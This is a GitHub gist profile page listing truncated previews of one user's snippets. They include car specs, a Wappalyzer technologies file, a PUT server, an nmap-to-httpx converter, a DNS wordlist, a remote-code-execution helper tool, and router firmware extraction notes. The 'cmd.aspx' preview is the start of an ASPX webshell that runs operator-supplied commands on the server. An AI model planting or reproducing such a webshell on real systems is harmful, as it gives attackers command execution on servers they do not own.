Skip to content

Instantly share code, notes, and snippets.

View Malayke's full-sized avatar


  • planet Earth (Solar System)
View GitHub Profile
Malayke / info.txt
Last active June 9, 2024 11:13
subaru brz zd8
发动机型号: 2.4升DOHC非涡轮增压发动机
总长:4,265毫米(167.9英寸)ET 除外,4,280毫米(168.5英寸)适用于 ET
Malayke / technologies.json
Created August 8, 2022 09:38
wappalyzer technologies
This file has been truncated, but you can view the full file.
"technologies": {
"1C-Bitrix": {
"cats": [
"category_names": null,
"cookies": {
Malayke /
Created June 9, 2022 07:55
python http put server
#!/usr/bin/env python3
import sys
import signal
from threading import Thread
from http.server import HTTPServer, BaseHTTPRequestHandler
Malayke /
Last active April 10, 2023 09:00
parse/convert nmap grep output(gnmap) to projectdiscovery httpx target
#!/usr/bin/env python3
import sys
if not sys.stdin.isatty():
stdin =
gnmap = stdin
elif len(sys.argv) > 1:
target = sys.argv[1]
with open(GNMAP) as f:
Malayke / all.txt
Created April 11, 2022 15:22 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
Malayke / cmd.aspx
Created May 8, 2020 08:51
dark theme cmd aspx webshell
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
myProcessStartInfo.UseShellExecute = false
Malayke /
Last active June 5, 2020 02:03
nmap quick scan script
Malayke /
Created January 18, 2019 09:29
Make Web Remote Code Execution Vulnerabilities Great Again!
from cmd import Cmd
import requests
import readline
import sys
from base64 import b64encode
from random import randrange
import threading
from time import sleep
Malayke / Export ZTE F460
Last active July 6, 2022 16:19
中兴 F460 电信光猫固件提取



/ # cat /proc/mtd
dev:    size   erasesize  name
mtd0: 08000000 00020000 "whole flash"
mtd1: 00200000 00020000 "u-boot"

Mounting JFFS2 Images on a Linux PC

It is possible to mount a binary JFFS2 image on a Linux PC without a flash device. This can be useful for examining the contents of the image, making required changes, and creating a new image in any format. When a JFFS2 image is copied directly from a JFFS2 flash partition, the resulting image is the size of the source partition, regardless of how much space is actually used for storage. Mounting the filesystem and using the mkfs.jffs2 utility to create a new image will result in a JFFS2 image without blank nodes. This can also be used to create multiple images for flashes with different characteristics, such as erase block sizes. This page describes two different methods of mounting JFFS2 images on a Linux PC.

This procedure requires that the following kernel modules are available or built-in to the kernel on the development machine: mtdram, mtdblock, jffs2, block2mtd, and loop.

Mounting JFFS2 Images using RAM

One method of mounting JFFS2 images uses the mt